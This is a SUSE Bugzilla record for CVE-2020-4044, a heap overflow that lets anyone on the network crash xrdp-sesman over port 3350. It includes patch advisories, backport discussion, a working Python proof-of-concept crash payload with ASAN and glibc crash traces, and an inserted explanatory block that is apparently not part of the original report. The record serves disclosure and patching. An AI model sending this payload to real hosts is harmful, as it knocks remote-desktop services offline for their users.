Bugzilla – Full Text Bug Listing

| Summary: | VUL-0: CVE-2020-4044: xrdp: xrdp-sesman can be crashed remotely over port 3350 | | |
|---|---|---|---|
| Product: | [Novell Products] SUSE Security Incidents | Reporter: | Wolfgang Frisch <wolfgang.frisch> |
| Component: | Incidents | Assignee: | Security Team bot <security-team> |
| Status: | RESOLVED FIXED | QA Contact: | Security Team bot <security-team> |
| Severity: | Major | | |
| Priority: | P2 - High | CC: | gabriele.sonnu, gianluca.gabrielli, rfrohl, smash_bz, thomas.leroy, yfjiang, yu.daike, zcjia |
| Version: | unspecified | | |
| Target Milestone: | --- | | |
| Hardware: | Other | | |
| OS: | Other | | |
| URL: | https://smash.suse.de/issue/262631/ | | |
| Whiteboard: | CVSSv3.1:SUSE:CVE-2020-4044:7.1:(AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H) | | |
| Found By: | Security Response Team | Services Priority: | |
| Business Priority: | | Blocker: | --- |
| Marketing QA Status: | --- | IT Deployment: | --- |
Description
Wolfgang Frisch
2020-07-01 13:18:36 UTC
There is no reproducer yet. Judging by the patch, at least the following code streams are affected:

SUSE:SLE-12-SP2:Update xrdp Affected
SUSE:SLE-12-SP3:Update xrdp Affected
SUSE:SLE-12-SP5:Update xrdp Affected
SUSE:SLE-15:Update xrdp Affected
SUSE:SLE-15-SP2:Update xrdp Affected

The impact still needs to be determined for:

SUSE:SLE-11-SP3:Update
SUSE:SLE-11-SP4:Update

SUSE-SU-2020:1918-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src): xrdp-0.9.10-3.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

SUSE-SU-2020:1933-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src): xrdp-0.9.6-4.8.1
SUSE Linux Enterprise Server 15-LTSS (src): xrdp-0.9.6-4.8.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src): xrdp-0.9.6-4.8.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src): xrdp-0.9.6-4.8.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src): xrdp-0.9.6-4.8.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Reproducer:

```python
#!/usr/bin/env python3
"""
PoC for xrdp CVE-2020-4044 (xrdp-sesman SCP listener on TCP port 3350)
Wolfgang Frisch <wfrisch@suse.com>
"""
import socket
import sys

# Target host and port; both can be overridden on the command line:
#   ./poc.py HOST PORT
host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
port = int(sys.argv[2]) if len(sys.argv) > 2 else 3350

# SCP v1 header: 32-bit big-endian version (1), then a 32-bit big-endian
# message size. The size field here is 0x272a = 10026, which is more than
# the 10020 bytes this script actually sends, and well beyond what
# sesman's receive buffer can hold.
payload = b'\x00\x00\x00\x01\x00\x00'
payload += b'\x27\x2a'  # size field (0x272a = 10026)
payload += b'\x00\x01\x00\x01\x06\x66\x6f\x6f\x62\x61\x72\x10'
payload += b'\x78' * 10000  # filler that sesman recv()s into its heap buffer

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(payload)
s.close()
```

ASAN output of recent unpatched version:

>==2629==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000004900 at pc 0x000000439d89 bp 0x7ffd1676cc20 sp 0x7ffd1676c3d0
>WRITE of size 10012 at 0x625000004900 thread T0
> #0 0x439d88 in __interceptor_recv ../../../../libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:6398
> #1 0x7f657196a5b1 in g_sck_recv /home/user/xrdp/xrdp/common/os_calls.c:1497
> #2 0x7f6571924ff4 in scp_tcp_force_recv /home/user/xrdp/xrdp/sesman/libscp/libscp_tcp.c:47
> #3 0x7f657193d249 in scp_v1s_accept /home/user/xrdp/xrdp/sesman/libscp/libscp_v1s.c:79
> #4 0x7f657194d1f7 in scp_vXs_accept /home/user/xrdp/xrdp/sesman/libscp/libscp_vX.c:52
> #5 0x4d4203 in scp_process_start /home/user/xrdp/xrdp/sesman/scp.c:54
> #6 0x4d6450 in sesman_main_loop /home/user/xrdp/xrdp/sesman/sesman.c:154
> #7 0x4d70d8 in main /home/user/xrdp/xrdp/sesman/sesman.c:456
> #8 0x7f65711f5cc9 in __libc_start_main ../csu/libc-start.c:308
> #9 0x409b79 in _start (/home/user/xrdp/xrdp/sesman/.libs/xrdp-sesman+0x409b79)

SLE-11-SP4 reliably crashes:

>[20200716-18:31:40] [WARN ] [v1s:75] connection aborted: network error
>[20200716-18:31:40] [WARN ] libscp network error.
>*** glibc detected *** xrdp-sesman: double free or corruption (!prev): 0x000000000060ee50 ***
>======= Backtrace: =========
>/lib64/libc.so.6(+0x790e8)[0x7f04c575d0e8]
>/lib64/libc.so.6(cfree+0x6c)[0x7f04c576218c]
>xrdp-sesman[0x4033b5]
>/lib64/libpthread.so.0(+0x7806)[0x7f04c5a67806]
>/lib64/libc.so.6(clone+0x6d)[0x7f04c57c27bd]

Can you please check SLE-11-SP3?
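The reproducer works because the client controls the 32-bit size field in the SCP v1 header, and the unpatched scp_v1s_accept hands that size to scp_tcp_force_recv, which recv()s into a fixed-size heap buffer: 0x272a = 10026 declared, and the ASAN report shows a 10012-byte write, i.e. everything that arrives after the 8-byte header. The block below is an added example, written for this listing; it is not from the bug report and not xrdp's own code. It decodes the header of the PoC payload, shows the unchecked byte count the vulnerable path would ask recv() for, and contrasts it with the bound check a fixed parser must apply before reading the body. The header layout (big-endian version, then big-endian total size including the header) is read off the PoC bytes; RECV_BUF_SIZE is a hypothetical buffer size chosen to be smaller than the PoC payload, as the trace implies the real one is, and all function names are mine.

```python
"""
Added example (not from the bug report, not xrdp code): parse the SCP v1
header the PoC sends and apply the missing size bound.

Assumptions, not stated on the page: header = big-endian u32 version,
big-endian u32 total size (header included); sesman's input stream is a
fixed RECV_BUF_SIZE-byte heap buffer (hypothetical value).
"""
import struct

SCP_VERSION_1 = 1
HEADER_LEN = 8          # version (4) + size (4)
RECV_BUF_SIZE = 8192    # hypothetical receive-buffer size, < PoC payload


def build_poc_payload(filler_len=10000):
    """Reconstruct the bytes the reproducer sends (constructed sample input)."""
    payload = b"\x00\x00\x00\x01\x00\x00"
    payload += b"\x27\x2a"          # size field = 0x272a = 10026
    payload += b"\x00\x01\x00\x01\x06\x66\x6f\x6f\x62\x61\x72\x10"
    payload += b"\x78" * filler_len
    return payload


def build_scp_v1_message(body):
    """Build a well-formed v1 message: version 1, size = header + body."""
    return struct.pack(">II", SCP_VERSION_1, HEADER_LEN + len(body)) + body


def parse_header_unchecked(data):
    """Mirror the vulnerable logic: trust the size field blindly.

    Returns (version, bytes_to_recv). recv()ing bytes_to_recv into a
    RECV_BUF_SIZE buffer is the heap-buffer-overflow in the ASAN trace.
    """
    version, size = struct.unpack(">II", data[:HEADER_LEN])
    return version, size - HEADER_LEN


def would_overflow(data, buf_size=RECV_BUF_SIZE):
    """True if the unchecked path would recv() past the end of the buffer."""
    _, to_recv = parse_header_unchecked(data)
    return to_recv > buf_size


def read_scp_v1_header(data, buf_size=RECV_BUF_SIZE):
    """Hardened parse: reject any size the receive buffer cannot hold.

    Raises ValueError on a short header, an unexpected version, a size
    smaller than the header itself (which would underflow `size - 8` in
    unsigned C arithmetic), or a body larger than the buffer.
    """
    if len(data) < HEADER_LEN:
        raise ValueError("short SCP header: %d bytes" % len(data))
    version, size = struct.unpack(">II", data[:HEADER_LEN])
    if version != SCP_VERSION_1:
        raise ValueError("unsupported SCP version %d" % version)
    if size < HEADER_LEN or size - HEADER_LEN > buf_size:
        raise ValueError("declared size %d outside [%d, %d]"
                         % (size, HEADER_LEN, HEADER_LEN + buf_size))
    return version, size - HEADER_LEN


def accepts_scp_v1_header(data, buf_size=RECV_BUF_SIZE):
    """Predicate form of read_scp_v1_header for quick checks."""
    try:
        read_scp_v1_header(data, buf_size)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    poc = build_poc_payload()
    version, to_recv = parse_header_unchecked(poc)
    print("PoC: version=%d size field=%d bytes sent=%d"
          % (version, to_recv + HEADER_LEN, len(poc)))
    print("unchecked path overflows buffer:", would_overflow(poc))
    print("hardened parser accepts PoC:", accepts_scp_v1_header(poc))
    ok = build_scp_v1_message(b"\x00\x01\x00\x01")
    print("hardened parser accepts well-formed message:", accepts_scp_v1_header(ok))
```

Run stand-alone it reports the 10026-byte declared size against the 10020 bytes sent, flags the overflow on the unchecked path, and shows the hardened parser rejecting the PoC while still accepting a body that exactly fills the buffer. The same predicate, fed the first eight bytes of each connection to TCP port 3350, is a cheap way to spot this class of oversized SCP message in a packet capture.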
SUSE-SU-2020:1943-1: An update that solves two vulnerabilities and has 8 fixes is now available.

Category: security (important)
Bug References: 1138954,1144327,1144379,1150584,1152711,1153471,1155789,1155952,1157860,1173580
CVE References: CVE-2017-6967,CVE-2020-4044
Sources used:
SUSE OpenStack Cloud 7 (src): xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src): xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src): xrdp-0.9.0~git.1456906198.f422461-16.20.1
SUSE Linux Enterprise Server 12-SP2-BCL (src): xrdp-0.9.0~git.1456906198.f422461-16.20.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

openSUSE-SU-2020:0999-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
openSUSE Leap 15.1 (src): xrdp-0.9.6-lp151.4.6.1

SUSE-SU-2020:1991-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud Crowbar 8 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud 9 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE OpenStack Cloud 8 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Linux Enterprise Server 12-SP3-BCL (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
SUSE Enterprise Storage 5 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1
HPE Helion Openstack 8 (src): xrdp-0.9.0~git.1456906198.f422461-21.27.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

SUSE-SU-2020:2142-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
JIRA References:
Sources used:
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src): xrdp-0.9.13.1-4.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

openSUSE-SU-2020:1200-1: An update that fixes one vulnerability is now available.

Category: security (important)
Bug References: 1173580
CVE References: CVE-2020-4044
JIRA References:
Sources used:
openSUSE Leap 15.2 (src): xrdp-0.9.13.1-lp152.3.3.1

Thanks for the clarification. Daike is newly joining to work on the remote desktop stack. He was working on the backport, so I will redirect the requirement to him.

Daike, can you please help on this?

(In reply to Yifan Jiang from comment #21)
> Thanks for the clarification. Daike is newly joining to work on the remote
> desktop stack. He was working on the backport, so I will redirect the
> requirement to him.
>
> Daike, can you please help on this?

Thanks for handling this, Daike. Have you made any progress on the backport to 11sp3? :)

(In reply to Thomas Leroy from comment #22)
> (In reply to Yifan Jiang from comment #21)
> > Thanks for the clarification. Daike is newly joining to work on the remote
> > desktop stack. He was working on the backport, so I will redirect the
> > requirement to him.
> >
> > Daike, can you please help on this?
>
> Thanks for handling this, Daike. Have you made any progress on the backport to
> 11sp3? :)

I happened to have a conversation with Daike this afternoon; the backport is across too many major versions and it needs line-to-line alignment of both code logic and lexical correctness. I know Daike is in the middle of dealing with it.

Cleaning up the GNOME CVE backlog. The fix has been submitted and accepted. Assigning back to the security team.

done, closing